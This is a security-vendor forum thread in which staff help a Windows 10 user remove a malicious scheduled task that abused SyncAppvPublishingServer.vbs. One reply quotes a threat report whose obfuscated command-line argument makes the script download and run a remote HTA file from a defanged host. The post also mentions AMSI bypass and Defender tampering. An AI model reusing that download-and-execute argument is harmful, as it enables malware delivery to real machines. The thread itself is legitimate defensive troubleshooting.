microbill 0 Posted June 15 Share Posted June 15 Every time I boot my PC and login to Windows 10, I am given the message shown in the attached image. Please see thread: https://www.tenforums.com/general-support/205472-windows-script-host-issue-syncappvpublishingserver-vbs.html Was pointed to a couple of threads here which seemed to indicate I could be dealing with a hidden trojan(?) Really hoping somebody would be able to point me in the right direction as some of the info in the threads below went over my head, and now I'm very concerned! https://forum.eset.com/topic/32186-two-strange-powershell-processes-maybe-coinminers/page/2/https://forum.eset.com/topic/32255-powershellagentaew-trojan-keeps-coming-back-after-cleaning-and-reboot/page/2/ Link to comment Share on other sites More sharing options...
microbill 0 Posted June 15 Author Share Posted June 15 Inside NetService folder Link to comment Share on other sites More sharing options...
Administrators Marcos 4,842 Posted June 15 Administrators Share Posted June 15 C:\Windows\System32\SyncAppvPublishingServer.vbs is a legit system file not detected by ESET. Please provide logs collected with ESET Log Collector. Link to comment Share on other sites More sharing options...
microbill 0 Posted June 15 Author Share Posted June 15 Have attached the logs - thanks eis_logs.zip Link to comment Share on other sites More sharing options...
itman 1,602 Posted June 15 Share Posted June 15 (edited) Appears this might be related to: https://forum.eset.com/topic/32255-powershellagentaew-trojan-keeps-coming-back-after-cleaning-and-reboot/page/2/ . Have you checked the Eset Dectections log for any PowerShell detection log entries related to this? In any case, a NetService\Network scheduled task is not a legit Win scheduled task. Also, Windows is stating it can't find C:\Windows\System32\SyncAppvPublishingServer.vbs file. If this file does exist on your Windows installation, I suspect the attacker screwed up in coding the full path correctly in the NetService\Network scheduled task actions tab causing the Windows file not found alert that is appearing. Edited June 15 by itman Link to comment Share on other sites More sharing options...
Administrators Marcos 4,842 Posted June 15 Administrators Share Posted June 15 Scheduler executed C:\Windows\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" followed by a PowerShell script malware (detected as PowerShell/Agent.AEW), however, there was no such record in the Detections log most likely because the vbs script no longer existed on the disk and could not actually run. However, I could not find any reference to the vbs file neither in the registry nor WMI repository. The system has been up for 12 hours. If you reboot, do you still get the message that the vbs file was not found? If so, please provide a Procmon boot log (saved unfiltered and compressed). Link to comment Share on other sites More sharing options...
itman 1,602 Posted June 15 Share Posted June 15 (edited) 1 hour ago, Marcos said: Scheduler executed C:\Windows\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" followed by a PowerShell script malware (detected as PowerShell/Agent.AEW), however, there was no such record in the Detections log most likely because the vbs script no longer existed on the disk and could not actually run. I believe my original theory is correct and the command line text wscript.exe executed wasn't coded properly. Assumed is Eset is only going to process the command line text after it was parsed by wscript.exe. Something along this example; Quote I'm trying to write a script that manipulates its command line and then runs the command line. E.g.: myscript.vbs "C:\Full Path\Program.exe" /option"Some option" "C:\Some file" /etc which would then execute: "C:\Full Path\Program.exe" /option"Some other option" "C:\Some other file" /etc The problem is that VBScript doesn't allow access to the full command line like most other languages. Furthermore, the individual parameters get the quotes stripped, so WScript.Arguments returns: C:\Full Path\Program.exe /optionSome other option C:\Some file /etc https://groups.google.com/g/microsoft.public.scripting.vbscript/c/TyCgZkAUS5o Edited June 15 by itman Link to comment Share on other sites More sharing options...
microbill 0 Posted June 16 Author Share Posted June 16 5 hours ago, itman said: Have you checked the Eset Dectections log for any PowerShell detection log entries related to this? Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here 21/04/2023 3:25:41 PM;HTTP filter;file;https://www.tumbex.com/pgpxgopaqym.php;JS/Adware.Plugrush.B application;connection terminated;DESKTOP-8K3015I\Jack;Event occurred during an attempt to access the web by the application: C:\Program Files\Mozilla Firefox\firefox.exe (F0C67FC4D1EB285A3C76A23DC38BF228BD60EC66).;A566A6BB374BF7D46BD3FF941067F26F4FAC1390; 5 hours ago, Marcos said: The system has been up for 12 hours. If you reboot, do you still get the message that the vbs file was not found? If so, please provide a Procmon boot log (saved unfiltered and compressed). I get the same message every time I boot Windows. Bootlog attached! It's a .rar for compression reasons Bootlog.rar Link to comment Share on other sites More sharing options...
Administrators Marcos 4,842 Posted June 16 Administrators Share Posted June 16 Did you stop logging after you got the error about missing SyncAppvPublishingServer.vbs? Since there's no reference to wscript.exe nor SyncAppvPublishingServer.vbs in the Procmon boot log, I assume that you stopped logging before the error. Link to comment Share on other sites More sharing options...
itman 1,602 Posted June 16 Share Posted June 16 Did you check if this file, C:\Windows\System32\SyncAppvPublishingServer.vbs, exists on your Windows installation? If it does not exist, open an admin level command prompt window. Then enter the following; sfc /scannow This will scan your Windows installation and replace/repair required Windows OS files. The scan will run for a while, so let it complete its processing. After the scan completes, verify if C:\Windows\System32\SyncAppvPublishingServer.vbs now exists. Link to comment Share on other sites More sharing options...
microbill 0 Posted June 16 Author Share Posted June 16 3 hours ago, itman said: Did you check if this file, C:\Windows\System32\SyncAppvPublishingServer.vbs, exists on your Windows installation? If it does not exist, open an admin level command prompt window. Then enter the following; sfc /scannow This will scan your Windows installation and replace/repair required Windows OS files. The scan will run for a while, so let it complete its processing. After the scan completes, verify if C:\Windows\System32\SyncAppvPublishingServer.vbs now exists. Do I want the file to (currently) exist if something is trying to use it for something other than it's intended purpose? 11 hours ago, Marcos said: Did you stop logging after you got the error about missing SyncAppvPublishingServer.vbs? Since there's no reference to wscript.exe nor SyncAppvPublishingServer.vbs in the Procmon boot log, I assume that you stopped logging before the error. I stopped logging after the error popped up, although I didn't clear the error. I'll do it again Link to comment Share on other sites More sharing options...
microbill 0 Posted June 16 Author Share Posted June 16 See attached bootlog. I cleared the error this time before opening Process Monitor and saving the log. Bootlog.rar Link to comment Share on other sites More sharing options...
itman 1,602 Posted June 16 Share Posted June 16 (edited) 55 minutes ago, microbill said: Do I want the file to (currently) exist if something is trying to use it for something other than it's intended purpose? I want you to verify that SyncAppvPublishingServer.vbs exists in C:\Windows\System32\ directory and post back your finding. Edited June 16 by itman Link to comment Share on other sites More sharing options...
Administrators Marcos 4,842 Posted June 16 Administrators Share Posted June 16 1 hour ago, microbill said: See attached bootlog. I cleared the error this time before opening Process Monitor and saving the log. This log is ok. Please run regedit and delete HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{22C947D6-7388-40A7-9A2C-0195436DE3EB}, then reboot the machine. Link to comment Share on other sites More sharing options...
microbill 0 Posted June 16 Author Share Posted June 16 (edited) 3 hours ago, itman said: I want you to verify that SyncAppvPublishingServer.vbs exists in C:\Windows\System32\ directory and post back your finding. No, it does not. 1 hour ago, Marcos said: This log is ok. Please run regedit and delete HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{22C947D6-7388-40A7-9A2C-0195436DE3EB}, then reboot the machine. The message no longer shows up! Edited June 16 by microbill Link to comment Share on other sites More sharing options...
itman 1,602 Posted June 16 Share Posted June 16 1 hour ago, microbill said: No, it does not. I recommend you run sfc as I posted previously: https://forum.eset.com/topic/36704-windows-script-host-issue-syncappvpublishingservervbs/?do=findComment&comment=168082 . This should restore SyncAppvPublishingServer.vbs which is a legit Win OS file. Link to comment Share on other sites More sharing options...
microbill 0 Posted June 17 Author Share Posted June 17 (edited) 1 hour ago, itman said: I recommend you run sfc as I posted previously: https://forum.eset.com/topic/36704-windows-script-host-issue-syncappvpublishingservervbs/?do=findComment&comment=168082 . This should restore SyncAppvPublishingServer.vbs which is a legit Win OS file. The file does not show in the folder Of note, my custom Windows 10 theme has now reverted from the green/yellow/red buttons in above screenshot, to the standard Windows 10 buttons. Edited June 17 by microbill Link to comment Share on other sites More sharing options...
Administrators Marcos 4,842 Posted June 17 Administrators Share Posted June 17 Strange, on my Win10 machine SyncAppvPublishingServer.vbs was restored after running sfc /scannow. Nevertheless, since it's not a file that you need and it's misused by malware, I'd suggest not to restore it unless you need it. Link to comment Share on other sites More sharing options...
microbill 0 Posted June 17 Author Share Posted June 17 Thank you. Should I run any other tests now aside from a normal Eset scan? Link to comment Share on other sites More sharing options...
Administrators Marcos 4,842 Posted June 17 Administrators Share Posted June 17 4 hours ago, microbill said: Thank you. Should I run any other tests now aside from a normal Eset scan? You can run a 2nd opinion scan with another AV (online scanner) but it's not necessary. Link to comment Share on other sites More sharing options...
itman 1,602 Posted June 17 Share Posted June 17 (edited) 11 hours ago, microbill said: The file does not show in the folder Did you reboot your PC before checking if SyncAppvPublishingServer.vbs was restored? Note the output message from the SFC scan. Edited June 17 by itman Link to comment Share on other sites More sharing options...
itman 1,602 Posted June 17 Share Posted June 17 Here's the malware attack details: https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/ . You stop crud like this by setting PowerShell to Constrained Language mode which prevents deployment of PowerShell subassemblies via .Net. Link to comment Share on other sites More sharing options...
itman 1,602 Posted June 19 Share Posted June 19 (edited) Another recent attack abusing SyncAppvPublishingServer.vbs is; Quote XWorm Delivered Through Tax Scam FortiGuard Labs became aware of a curious-looking archive file hosted on an open directory on www[.]farmaciasmv[.]com/citrix/2022%20tax_documents[.]zip, which has since been removed. The zip file contains the following files: Annual Withdrawal.xlsx (SHA2: 59bb292565ebc86800e5e4d625d3c19f98afe2261d3da1a8e2f9b45ec76153a0) Robert tax_docs.pdf (SHA2: a9f4b054ea128529c62a8ff25f1439651f045e443adf5ff11fb5bd29f1333a7a) The XLSX file is a benign decoy file that contains financial data from an unknown source. The other file is malicious. Despite Robert tax_docs.pdf having a PDF icon, it is different from what it seems. The file is actually a link (LNK) file that launches the legitimate script (C:\Windows\System32\SyncAppvPublishingServer.vbs), which has a known issue of taking command line arguments. The link file exploits this issue and feeds the legitimate script with the following command line argument to download and execute a remote “note.hta”: ;\W_\*2\\\m_h_a_e ('http'+'://datacenter002[.]myftp[.]biz/documents/note.'+'hta') The downloaded note.hta uses PowerShell to download another remote file hosted on hxxp://datacenter002[.]myftp[.]biz/documents/note[.]gif, which was not available at the time of our investigation. Finding another note.gif (SHA2: 0487ef401345aa17c6aaeac23151219863e1363f82fe76edd0066bbf3fb07715) based on the same infection chain let us continue our quest to the payload. note.gif is a PowerShell script that creates the following files: C:\Users\Public\onedrive.vbs (SHA2: 92C1767EE4A954B93D6AFA9AE83FE82B82D2867D919D0359DCF2C8DA75FB8C7C) C:\Users\Public\test.vbs (SHA2: ADBA59F1495965684EEB4C5DAAD67F732FEB5E9183AE05EB869E20C88CAD7327) C:\Users\Public\onedrive.ps1 (SHA2: 7A9705A424A634A321DB9F36B61D74B953A44D44EDC429F7641BF830870572FC) Once launched, it executes the onedrive.vbs and test.vbs files. Test.vbs creates %usertemp%\Note.txt, a clean file containing fake "QUARTERLY TAX PAYMENTS FOR 2022" data. Onedrive.vbs runs the previously created onedrive.ps1 filled with activities designed to hamper Windows Defender. The malware then proceeds to perform an AMSI bypass and totally trash Windows Defender protection mechanisms. Full detailed analysis here: https://www.fortinet.com/blog/threat-research/tax-scammers-at-large I do think its about time Eset start warning about command line input on SyncAppvPublishingServer.vbs execution. Edited June 19 by itman Link to comment Share on other sites More sharing options...
microbill 0 Posted June 19 Author Share Posted June 19 On 6/17/2023 at 6:03 AM, itman said: Did you reboot your PC before checking if SyncAppvPublishingServer.vbs was restored? Note the output message from the SFC scan. I did, and have rebooted a handful of times this weekend and there is still no file. Should I be concerned? I worry that whatever this malware code was may be embedded somewhere else waiting to strike. On 6/17/2023 at 7:56 AM, itman said: Here's the malware attack details: https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/ . You stop crud like this by setting PowerShell to Constrained Language mode which prevents deployment of PowerShell subassemblies via .Net. Thank you for this. To confirm, I should execute this code within Powershell? I was going to ask if should create a new User account on this W10 install and then deactivate the Administrator account but upon looking, the account I use is not the "Administrator" account. Link to comment Share on other sites More sharing options...
itman 1,602 Posted June 19 Share Posted June 19 (edited) 1 hour ago, microbill said: To confirm, I should execute this code within Powershell? No! It's just an illustration of one method SyncAppvPublishingServer.vbs can be abused. As far as SyncAppvPublishingServer.vbs missing from your Windows installation, I agree w/@Marcos that you should not be concerned about it. As best as I can determine, the only process that legitimately uses it is Office 2010 Access. Edited June 19 by itman Link to comment Share on other sites More sharing options...
Recommended Posts